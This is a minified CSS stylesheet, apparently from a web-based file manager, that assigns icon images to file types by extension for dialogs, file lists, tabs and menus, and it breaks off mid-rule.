.aui-main{border-color:rgba(0,0,0,0.2);}body div.dialog-simple.dialog-can-resize.aui-state-drag .aui-header,body div.dialog-simple.dialog-can-resize .dialog-mouse-in .aui-header{opacity:1.0;filter:alpha(opacity=100);border-color:rgba(0,0,0,0.2);}body div.dialog-simple.aui-state-drag .aui-header{opacity:1.0;filter:alpha(opacity=100);}body div.dialog-simple.dialog-max .aui-header{opacity:1.0;filter:alpha(opacity=100);}.x-item-small{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.x-item-file{background-repeat:no-repeat;background-size:cover;background-position:center;background-image:url("../../../images/file_icon/icon_file/file.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');width:100%;height:100%;display:inline-block;pointer-events:none;}.x-item-file.small{width:20px;height:20px;}.file-list-icon .file .ico .x-item-file{border-radius:5px;margin-top:6px;margin-top:4px;}.bindary-box .ico .x-item-file{width:90px;height:90px;margin-top:28px;}.file-list-list .file .ico .x-item-file,.file-list-split .file .ico .x-item-file{border:none;}.ztree li span.tree_icon .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.header-content #yarnball .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.task-tab .tabs .tab .x-item-file,.task-tab .tabs .tab img{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.tasktab-dragging.tab .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.tasktab-dragging.tab img{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.aui-title .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.edit-tab .tabs .tab .name .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.draggable-dragging .name .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.do-search-box .search-result .file-item .file-info .file-icon .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.context-menu-list .context-menu-item .font-icon.x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;margin-right:12px;}.context-menu-list .context-menu-item .font-icon.x-item-file:before{content:"";}.context-menu-list .context-menu-item img.x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;background:none;margin-right:12px;height:auto;}.aui-title .x-item-file.x-font-icon{font-size:12px;line-height:18px;color:#fff;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.5)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-moz-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-o-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-ms-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));-pie-background:linear-gradient(to 164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));}.x-txt.small,.x-textile.small,.x-inc.small,.x-log.small{background-image:url("../../../images/file_icon/icon_file/txt_small.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt_small.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt_small.png?ver=3.30',sizingMethod='scale');background-size:auto;}.x-php.small{background-image:url("../../../images/file_icon/icon_file/php_small.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/php_small.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/php_small.png?ver=3.30',sizingMethod='scale');background-size:auto;}.x-txt,.x-textile,.x-oexe,.x-inc,.x-csv,.x-log,.x-asc,.x-tsv,.x-lnk,.x-url,.x-webloc,.x-meta,.x-localized,.x-xib,.x-xsd,.x-storyboard,.x-plist,.x-csproj,.x-pch,.x-pbxproj,.x-local,.x-xcscheme,.x-manifest,.x-vbproj,.x-strings,.x-jshintrc,.x-sublime-project,.x-readme,.x-changes,.x-changelog,.x-version,.x-license,.x-changelog,.x-abap,.x-abc,.x-as,.x-asp,.x-aspx,.x-ada,.x-adb,.x-htaccess,.x-htgroups,.x-htgroups,.x-htpasswd,.x-asciidoc,.x-adoc,.x-asm,.x-a,.x-ahk,.x-bat,.x-cmd,.x-cpp,.x-c,.x-cc,.x-cxx,.x-h,.x-hh,.x-hpp,.x-ino,.x-c9search_results,.x-cirru,.x-cr,.x-clj,.x-cljs,.x-cbl,.x-cob,.x-coffee,.x-cf,.x-cson,.x-cakefile,.x-cfm,.x-cs,.x-css,.x-curly,.x-d,.x-di,.x-dart,.x-diff,.x-patch,.x-dockerfile,.x-dot,.x-dummy,.x-dummy,.x-e,.x-ge,.x-ejs,.x-ex,.x-exs,.x-elm,.x-erl,.x-hrl,.x-frt,.x-fs,.x-ldr,.x-ftl,.x-gcode,.x-feature,.x-.gitignore,.x-glsl,.x-frag,.x-vert,.x-gbs,.x-go,.x-groovy,.x-haml,.x-hbs,.x-handlebars,.x-tpl,.x-mustache,.x-hs,.x-hx,.x-html,.x-hta,.x-htm,.x-xhtml,.x-eex,.x-html.eex,.x-erb,.x-rhtml,.x-html.erb,.x-ini,.x-inf,.x-conf,.x-cfg,.x-prefs,.x-io,.x-jack,.x-jade,.x-java,.x-ji,.x-jl,.x-jq,.x-js,.x-jsm,.x-json,.x-jsp,.x-jsx,.x-latex,.x-ltx,.x-bib,.x-lean,.x-hlean,.x-less,.x-liquid,.x-lisp,.x-ls,.x-logic,.x-lql,.x-lsl,.x-lua,.x-lp,.x-lucene,.x-Makefile,.x-makemakefile,.x-gnumakefile,.x-makefile,.x-ocamlmakefile,.x-make,.x-md,.x-markdown,.x-mask,.x-matlab,.x-mz,.x-mel,.x-mc,.x-mush,.x-mysql,.x-nix,.x-nsi,.x-nsh,.x-m,.x-mm,.x-ml,.x-mli,.x-pas,.x-p,.x-pl,.x-pm,.x-pgsql,.x-php,.x-phtml,.x-shtml,.x-php3,.x-php4,.x-php5,.x-phps,.x-phpt,.x-aw,.x-ctp,.x-module,.x-ps1,.x-praat,.x-praatscript,.x-psc,.x-proc,.x-plg,.x-prolog,.x-properties,.x-proto,.x-py,.x-r,.x-cshtml,.x-rd,.x-rhtml,.x-rst,.x-rb,.x-ru,.x-gemspec,.x-rake,.x-guardfile,.x-rakefile,.x-gemfile,.x-rs,.x-sass,.x-scad,.x-scala,.x-scm,.x-sm,.x-rkt,.x-oak,.x-scheme,.x-scss,.x-sh,.x-bash,.x-bashrc,.x-sjs,.x-smarty,.x-tpl,.x-snippets,.x-soy,.x-space,.x-sql,.x-sqlserver,.x-styl,.x-stylus,.x-svg,.x-swift,.x-tcl,.x-tex,.x-toml,.x-twig,.x-swig,.x-ts,.x-typescript,.x-str,.x-vala,.x-vbs,.x-vb,.x-vm,.x-v,.x-vh,.x-sv,.x-svh,.x-vhd,.x-vhdl,.x-wlk,.x-wpgm,.x-wtest,.x-xml,.x-rdf,.x-rss,.x-wsdl,.x-xslt,.x-atom,.x-mathml,.x-mml,.x-xul,.x-xbl,.x-xaml,.x-xq,.x-yaml,.x-yml,.x-cer,.x-reg,.x-config,.x-srt,.x-ass,.x-lrc{background-image:url("../../../images/file_icon/icon_file/txt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt.png?ver=3.30',sizingMethod='scale');}.x-pl,.x-pm,.x-cgi,.x-as,.x-asm,.x-clj,.x-cbl,.x-cfm,.x-d,.x-diff,.x-dot,.x-ejs,.x-erl,.x-ftl,.x-go,.x-hs,.x-vbs,.x-haml,.x-erb,.x-jade,.x-json,.x-jq,.x-jsx,.x-ji,.x-tex,.x-lisp,.x-ls,.x-lsl,.x-lua,.x-lp,.x-matlab,.x-mel,.x-r,.x-yaml,.x-yml{background-image:url("../../../images/file_icon/icon_file/code.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/code.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/code.png?ver=3.30',sizingMethod='scale');}.x-bin,.x-hex,.x-zip,.x-pdf,.x-swf,.x-gzip,.x-rar,.x-arj,.x-tar,.x-gz,.x-cab,.x-tbz,.x-tbz2,.x-lzh,.x-uue,.x-bz2,.x-ace,.x-exe,.x-so,.x-dll,.x-chm,.x-rtf,.x-odp,.x-odt,.x-pages,.x-class,.x-psd,.x-ttf,.x-fla,.x-dmg,.x-dat,.x-ipa,.x-lib,.x-a,.x-apk,.x-so,.x-o{background-image:url("../../../images/file_icon/icon_file/bin.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/bin.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/bin.png?ver=3.30',sizingMethod='scale');}.x-music,.x-mp3,.x-wma,.x-mp2,.x-mid,.x-aac,.x-ogg,.x-oga,.x-webma,.x-wav,.x-m4a,.x-m3u,.x-m4a,.x-midi,.x-mid,.x-flac,.x-alac,.x-ape,.x-ac3{background-image:url("../../../images/file_icon/icon_file/music.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/music.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/music.png?ver=3.30',sizingMethod='scale');}.x-avi,.x-rm,.x-rmvb,.x-mpg,.x-mkv,.x-wmv,.x-mov,.x-mp4,.x-evo,.x-divx,.x-3gp,.x-asf,.x-ogv,.x-webmv,.x-cue,.x-hd,.x-hdmov,.x-mov,.x-mp4v,.x-mpeg,.x-ogm,.x-qt,.x-spx,.x-vob,.x-wmv,.x-xvid,.x-webm,.x-m4v,.x-mts,.x-mpe,.x-m2ts,.x-mpv,.x-cue{background-image:url("../../../images/file_icon/icon_file/movie.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/movie.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/movie.png?ver=3.30',sizingMethod='scale');}.x-flv,.x-f4v{background-image:url("../../../images/file_icon/icon_file/flv.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/flv.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/flv.png?ver=3.30',sizingMethod='scale');}.x-html,.x-htm,.x-url,.x-tpl,.x-lnk,.x-haml,.x-shtml,.x-webloc,.x-hta,.x-xhtml{background-image:url("../../../images/file_icon/icon_file/html.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/html.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/html.png?ver=3.30',sizingMethod='scale');}.x-css,.x-less,.x-sass{background-image:url("../../../images/file_icon/icon_file/css.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/css.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/css.png?ver=3.30',sizingMethod='scale');}.x-js,.x-coffee,.x-jsx{background-image:url("../../../images/file_icon/icon_file/js.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/js.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/js.png?ver=3.30',sizingMethod='scale');}.x-xml,.x-config,.x-manifest,.x-xaml,.x-csproj,.x-vbproj{background-image:url("../../../images/file_icon/icon_file/xml.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xml.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xml.png?ver=3.30',sizingMethod='scale');}.x-cs,.x-asp,.x-aspx{background-image:url("../../../images/file_icon/icon_file/cs.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cs.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cs.png?ver=3.30',sizingMethod='scale');}.x-java,.x-jsp{background-image:url("../../../images/file_icon/icon_file/java.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/java.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/java.png?ver=3.30',sizingMethod='scale');}.x-mm,.x-cc,.x-cxx,.x-cpp,.x-c,.x-m,.x-nc{background-image:url("../../../images/file_icon/icon_file/cpp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cpp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cpp.png?ver=3.30',sizingMethod='scale');}.x-h,.x-hpp,.x-hh,.x-pch{background-image:url("../../../images/file_icon/icon_file/h.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/h.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/h.png?ver=3.30',sizingMethod='scale');}.x-png,.x-jpg,.x-jpeg,.x-bmp,.x-gif,.x-picture,.x-ico,.x-svg,.x-cur,.x-webp,.x-tif,.x-tiff{background-image:url("../../../images/file_icon/icon_file/jpg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jpg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jpg.png?ver=3.30',sizingMethod='scale');}.x-make,.x-Makefile,.x-makefile,.x-GNUmakefile,.x-OCamlMakefile,.x-makemakefile{background-image:url("../../../images/file_icon/icon_file/makefile.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/makefile.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/makefile.png?ver=3.30',sizingMethod='scale');}.x-iso,.x-vcd{background-image:url("../../../images/file_icon/icon_file/iso.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/iso.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/iso.png?ver=3.30',sizingMethod='scale');}.x-pkg,.x-package,.x-framework{background-image:url("../../../images/file_icon/icon_file/pkg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pkg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pkg.png?ver=3.30',sizingMethod='scale');}.x-7z,.x-apk,.x-ace,.x-arj,.x-bza,.x-cab,.x-cxr,.x-dgc,.x-gca,.x-gz,.x-gza,.x-iso,.x-jar,.x-lzh,.x-rar,.x-rk,.x-tar,.x-tbz,.x-tgz,.x-tlz,.x-txz,.x-yz1,.x-zip{background-image:url("../../../images/file_icon/icon_file/zip_all.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/zip_all.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/zip_all.png?ver=3.30',sizingMethod='scale');}.x-exe,.x-bin,.x-class,.x-a,.x-so{background-image:url("../../../images/file_icon/icon_file/exe.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/exe.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/exe.png?ver=3.30',sizingMethod='scale');}.x-ttf,.x-otf,.x-eot,.x-woff,.x-tiff,.x-ttc{background-image:url("../../../images/file_icon/icon_file/font.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/font.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/font.png?ver=3.30',sizingMethod='scale');}.x-bat,.x-cmd,.x-sh,.x-bash,.x-bashrc{background-image:url("../../../images/file_icon/icon_file/cmd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cmd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cmd.png?ver=3.30',sizingMethod='scale');}.x-ini,.x-inf,.x-conf,.x-meta,.x-gitignore,.x-plist,.x-htaccess,.x-localized,.x-xcscheme,.x-storyboard,.x-xib,.x-strings,.x-pbxproj{background-image:url("../../../images/file_icon/icon_file/ini.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ini.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ini.png?ver=3.30',sizingMethod='scale');}.x-md,.x-markdown{background-image:url("../../../images/file_icon/icon_file/md.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/md.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/md.png?ver=3.30',sizingMethod='scale');}.x-file{background-image:url("../../../images/file_icon/icon_file/file.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');}.x-accdb{background-image:url("../../../images/file_icon/icon_file/accdb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/accdb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/accdb.png?ver=3.30',sizingMethod='scale');}.x-7z{background-image:url("../../../images/file_icon/icon_file/7z.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/7z.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/7z.png?ver=3.30',sizingMethod='scale');}.x-ai{background-image:url("../../../images/file_icon/icon_file/ai.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ai.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ai.png?ver=3.30',sizingMethod='scale');}.x-air{background-image:url("../../../images/file_icon/icon_file/air.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/air.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/air.png?ver=3.30',sizingMethod='scale');}.x-arj{background-image:url("../../../images/file_icon/icon_file/arj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/arj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/arj.png?ver=3.30',sizingMethod='scale');}.x-apk{background-image:url("../../../images/file_icon/icon_file/apk.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/apk.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/apk.png?ver=3.30',sizingMethod='scale');}.x-as{background-image:url("../../../images/file_icon/icon_file/as.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/as.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/as.png?ver=3.30',sizingMethod='scale');}.x-ascx{background-image:url("../../../images/file_icon/icon_file/ascx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ascx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ascx.png?ver=3.30',sizingMethod='scale');}.x-ashx{background-image:url("../../../images/file_icon/icon_file/ashx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ashx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ashx.png?ver=3.30',sizingMethod='scale');}.x-asmx{background-image:url("../../../images/file_icon/icon_file/asmx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/asmx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/asmx.png?ver=3.30',sizingMethod='scale');}.x-aspx{background-image:url("../../../images/file_icon/icon_file/aspx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/aspx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/aspx.png?ver=3.30',sizingMethod='scale');}.x-bz2{background-image:url("../../../images/file_icon/icon_file/bz2.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/bz2.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/bz2.png?ver=3.30',sizingMethod='scale');}.x-cdr{background-image:url("../../../images/file_icon/icon_file/cdr.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cdr.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cdr.png?ver=3.30',sizingMethod='scale');}.x-cer{background-image:url("../../../images/file_icon/icon_file/cer.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cer.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cer.png?ver=3.30',sizingMethod='scale');}.x-chm{background-image:url("../../../images/file_icon/icon_file/chm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/chm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/chm.png?ver=3.30',sizingMethod='scale');}.x-cmd{background-image:url("../../../images/file_icon/icon_file/cmd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cmd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cmd.png?ver=3.30',sizingMethod='scale');}.x-c{background-image:url("../../../images/file_icon/icon_file/c.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/c.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/c.png?ver=3.30',sizingMethod='scale');}.x-cpp{background-image:url("../../../images/file_icon/icon_file/cpp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cpp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cpp.png?ver=3.30',sizingMethod='scale');}.x-cs{background-image:url("../../../images/file_icon/icon_file/cs.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cs.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cs.png?ver=3.30',sizingMethod='scale');}.x-cshtml{background-image:url("../../../images/file_icon/icon_file/cshtml.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cshtml.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cshtml.png?ver=3.30',sizingMethod='scale');}.x-csproj{background-image:url("../../../images/file_icon/icon_file/csproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/csproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/csproj.png?ver=3.30',sizingMethod='scale');}.x-css{background-image:url("../../../images/file_icon/icon_file/css.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/css.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/css.png?ver=3.30',sizingMethod='scale');}.x-csv{background-image:url("../../../images/file_icon/icon_file/csv.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/csv.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/csv.png?ver=3.30',sizingMethod='scale');}.x-djvu{background-image:url("../../../images/file_icon/icon_file/djvu.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/djvu.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/djvu.png?ver=3.30',sizingMethod='scale');}.x-dll{background-image:url("../../../images/file_icon/icon_file/dll.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dll.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dll.png?ver=3.30',sizingMethod='scale');}.x-dng{background-image:url("../../../images/file_icon/icon_file/dng.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dng.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dng.png?ver=3.30',sizingMethod='scale');}.x-dmg,.x-img{background-image:url("../../../images/file_icon/icon_file/dmg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dmg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dmg.png?ver=3.30',sizingMethod='scale');}.x-doc,.x-wps{background-image:url("../../../images/file_icon/icon_file/doc.png");background-image:none 